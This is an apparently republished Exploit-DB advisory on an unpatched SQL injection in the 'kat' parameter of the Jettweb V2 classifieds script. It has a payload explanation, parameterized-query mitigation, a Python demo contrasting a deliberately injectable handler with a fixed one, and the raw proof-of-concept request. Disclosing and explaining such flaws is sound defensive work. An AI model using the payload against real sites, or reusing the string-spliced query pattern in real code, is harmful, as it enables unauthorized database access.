Vendor: Jettweb Php Hazir Ilan Sitesi Scripti V2
By: Ahmet Ümit BAYRAM
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Jettweb Php Hazir Ilan Sitesi Scripti V2
Affected Version From: V2
Affected Version To: V2
Patch Exists: NO
Related CWE:
CPE: a:jettweb:jettweb_php_hazir_ilan_sitesi_scripti_v2
Metasploit:
Other Scripts:
Platforms Tested: Kali Linux
Year: 2019

Jettweb Php Hazir Ilan Sitesi Scripti V2 – SQL Injection

An SQL injection vulnerability exists in Jettweb Php Hazir Ilan Sitesi Scripti V2: the 'kat' GET parameter of the 'm/katgetir.php' script is placed into an SQL statement without sanitization or parameter binding, so an attacker can execute arbitrary SQL against the backing database. The payload `kat=1' OR NOT 1300=1300-- rwTf` closes the string literal, appends a condition and comments out the rest of the statement; it is the always-false half of a boolean-based blind check (the `-- rwTf` tail is a comment with a random suffix, as produced by sqlmap), and the fact that the server accepts it and answers differently from the always-true variant is what confirms the injection.

Mitigation:

Use parameterized (prepared) statements so that the 'kat' value is bound as data and never parsed as SQL. Input validation (for example, rejecting anything that is not a numeric category id) is a useful additional layer but is not a substitute for parameter binding.
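The boolean-based blind check behind the payload above, and the parameterized fix described in the mitigation, as an added example (not code from the advisory or from the Jettweb product). The advisory does not show the script's schema or query, so a hypothetical `ilanlar` table with a `kat` column stands in for the real one; `katgetir_vulnerable` splices the parameter into the statement the way 'katgetir.php' evidently does, and `katgetir_fixed` binds it. Feeding the advisory's always-false payload and its always-true twin through each handler shows why the first leaks and the second does not.

```python
import sqlite3

# Constructed sample data for a hypothetical 'ilanlar' (listings) table with a
# 'kat' (category) column. Table and column names are assumptions, not the
# real schema of the Jettweb script.
SAMPLE_ROWS = [
    (1, "1", "Satilik daire"),
    (2, "1", "Kiralik daire"),
    (3, "2", "Satilik araba"),
    (4, "3", "Is ilani"),
]

# The advisory's payload (NOT 1300=1300 is always false) and its always-true
# counterpart. A boolean-based blind scanner sends both and compares responses.
PAYLOAD_FALSE = "1' OR NOT 1300=1300-- rwTf"
PAYLOAD_TRUE = "1' OR NOT 1300=1301-- rwTf"


def make_db():
    """In-memory SQLite database populated with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE ilanlar (id INTEGER PRIMARY KEY, kat TEXT, baslik TEXT)")
    conn.executemany("INSERT INTO ilanlar VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def katgetir_vulnerable(conn, kat):
    """Reconstruction of the flaw class: the GET parameter is spliced into SQL.

    With PAYLOAD_FALSE the statement becomes
      ... WHERE kat = '1' OR NOT 1300=1300-- rwTf'
    The quote closes the literal, '--' comments out the dangling quote, and the
    appended condition is evaluated by the database.
    """
    sql = f"SELECT id, baslik FROM ilanlar WHERE kat = '{kat}'"
    return conn.execute(sql).fetchall()


def katgetir_fixed(conn, kat):
    """Parameterized query: 'kat' is bound as a value and never parsed as SQL."""
    return conn.execute(
        "SELECT id, baslik FROM ilanlar WHERE kat = ?", (kat,)
    ).fetchall()


def is_blind_injectable(handler):
    """True if the always-false and always-true payloads yield different results,
    which is the signal a boolean-based blind scanner looks for."""
    conn = make_db()
    false_rows = handler(conn, PAYLOAD_FALSE)
    true_rows = handler(conn, PAYLOAD_TRUE)
    return len(false_rows) != len(true_rows)


if __name__ == "__main__":
    print("vulnerable handler injectable:", is_blind_injectable(katgetir_vulnerable))
    print("fixed handler injectable:     ", is_blind_injectable(katgetir_fixed))
```

Against the vulnerable handler the false payload returns only category 1 (2 rows) while the true payload returns every listing (4 rows); the fixed handler returns no rows for either, because no category is literally named `1' OR NOT 1300=1300-- rwTf`, so the two responses are indistinguishable.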
Source (Exploit-DB raw data):

# Exploit Title: Jettweb Php Hazır İlan Sitesi Scripti V2 - SQL Injection
# Date: 25.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://jettweb.net/c-23-ilan-Siteleri.html
# Demo Site: http://ilanv2.proemlaksitesi.net
# Version: V2
# Tested on: Kali Linux
# CVE: N/A

----- PoC : SQLi -----

Request: http://localhost/[PATH]/m/katgetir.php?kat=1
Vulnerable Parameter: kat (GET)
Payload: kat=1' OR NOT 1300=1300-- rwTf